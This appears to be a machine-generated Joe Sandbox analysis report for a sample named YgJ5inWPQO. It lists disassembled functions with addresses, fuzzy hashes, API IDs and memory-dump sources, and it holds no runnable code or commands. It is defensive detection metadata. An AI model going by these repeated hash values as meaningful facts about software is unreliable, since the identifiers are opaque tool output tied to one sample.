                                                                                                                                                                                                      • Instruction ID: 3ba2ff0efef46aeb1bcd9b7983cf785524c735a4563e49ffb1b34ac2f8799542
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56517722B182D586E7399E35A8817A9BB91E744B94F889331CBBC47BC5CF3DE441C760
                                                                                                                                                                                                      Function 00007FF7FF5A0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1010374628-0
                                                                                                                                                                                                      • Opcode ID: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                      • Instruction ID: d88460e8ef522431d933edb336697bc7b54ccfa642ba459e51a79240b5e97f4c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d471da97334de2acf0262392bad6ca7d41a72817533bf8b70dbf69db73f0db4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6E02A121A2E6C341FB65BB2194102F9E694AF06B90FC58734DD7E473D2DE7CA46583B0
                                                                                                                                                                                                      Function 00007FF7FF59DACC Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: gfffffff
                                                                                                                                                                                                      • API String ID: 0-1523873471
                                                                                                                                                                                                      • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                      • Instruction ID: 399ffe35ac37805db1f15f8fff2ff88c0ef742810d060da4ec9c3174c88c5270
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AA14562A087C586EB39DF29A0007F9BB91AB61784F449231DEAD477C5EE3DE502C750
                                                                                                                                                                                                      Function 00007FF7FF598804 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID: TMP
                                                                                                                                                                                                      • API String ID: 3215553584-3125297090
                                                                                                                                                                                                      • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                      • Instruction ID: 3ebc97b0d841bf40273a5bd3b97859fba34819f103c60bd7b627b92533d2c98f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51B011B096C241FB7CBB2659011FAD2906F45BC5FC94634DE3E4BBD2EE3CE40242A8
                                                                                                                                                                                                      Function 00007FF7FF5A34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                      • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                      • Instruction ID: 2ae1a06c84b23108d3b6578163a2a44667cc35ecd56f8e8a5705536a8dcbc4c6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64B09220E07A86D2EF083B21AC8265866A4BF48700FD80239C03E52370DE2C24F557A0
                                                                                                                                                                                                      Function 00007FF7FF593610 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                      • Instruction ID: 26bdc9d54fa2706911e6d412de1feacc4c1cd3ee440e24d0c496ad7d90e877ce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11D1C766A08682C5EB3CAF25C0502BDA7A9EB05B48F954335CE3D276D5CF3DE945C3A0
                                                                                                                                                                                                      Function 00007FF7FF589870 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                      • Instruction ID: a3298dd1c795d9989f13f75f62d537c141be1d421859e1ee2b2c5dd48ed9a8f7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1A0762181E08BD289EB29E4694BA73D0F78930EBD5416BEF87477C5CB3CA414DB60
                                                                                                                                                                                                      Function 00007FF7FF592C80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                      • Instruction ID: c58f0eb45f6bd358d794fe9a7e688809c7c251cc2ed2c4df10977808cb21206a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2B17F729087C585F7789F29C0901BCBBA0E745B48FA45239CA6D473D5CFB9D441C7A0
                                                                                                                                                                                                      Function 00007FF7FF59E5E0 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                      • Instruction ID: 2297b4536b18c5886addec34dc26ea9178f23ae7ccb855635c7d76ab880ac86c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3981F272A087D187EB789B19E4803BABA91FB45794F844335DABD03BC5CE3DE4008B60
                                                                                                                                                                                                      Function 00007FF7FF5A6488 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
                                                                                                                                                                                                      • Instruction ID: a5a91c10672adc1cc839c15c83573fa6a9e60bf2ba52f742e4ffca596ecdd88a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9612A22E0E6D246FB34AA28C4442FDE690AF45B60FD84339D63D476C5DE7DE8108BB0
                                                                                                                                                                                                      Function 00007FF7FF591DC4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                      • Instruction ID: 267d0cd1162837d794195534132c4cfc4459cc48c1db9f5fbbfa5357688b93ec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08518B36A146A585EB389B29D040278B7A0EB45B58F645331DE7D177D4CF3AE843C7D0
                                                                                                                                                                                                      Function 00007FF7FF5921D4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                      • Instruction ID: 7eee85a1eed5d253a266a2b4c5c462fb89a684cbb149678b3badde1ba4f2edc2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1518436A1869182FB389B29C0402B8B3A1EB54B58F648335CE7D077D4CF7AE843C790
                                                                                                                                                                                                      Function 00007FF7FF5919B4 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                      • Instruction ID: 027b7e8294683a44dc347c2335d5036d0db9ee9e144357f547cfafc6c34f6437
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22519A36A146A185EB389B29C04027873A1EB45B58FA45232CE7D577D5DF3AEC43C7D0
                                                                                                                                                                                                      Function 00007FF7FF591FD0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                      • Instruction ID: b21f5ae3818212fb5d37f3d08c0a77ec5d88e06f5a36bc1699809ca0fda8da01
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D251B636A1869185F7389B29D4402B87BA0EB44B58FA44231CE6D577E4CFBAEC53C7D0
                                                                                                                                                                                                      Function 00007FF7FF5917B0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                      • Instruction ID: 896c3dbe3fb30ae91b548be7ad23437a6c93dbe080526e20835cb786206915b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251A636A186A185EB389B29C0402BCB7A1EB45B5CF655231CE6D177D4CF3AE843D7D0
                                                                                                                                                                                                      Function 00007FF7FF591BC0 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                      • Instruction ID: 16621c9d0578dc1d976e6847829697e41373634d5cb8dcd540785c872a1c5235
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12518736A187A185EB389B29C0442B877A1EB45B58FB45231CE6D177D4CF3AE843C7D0
                                                                                                                                                                                                      Function 00007FF7FF595DA0 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
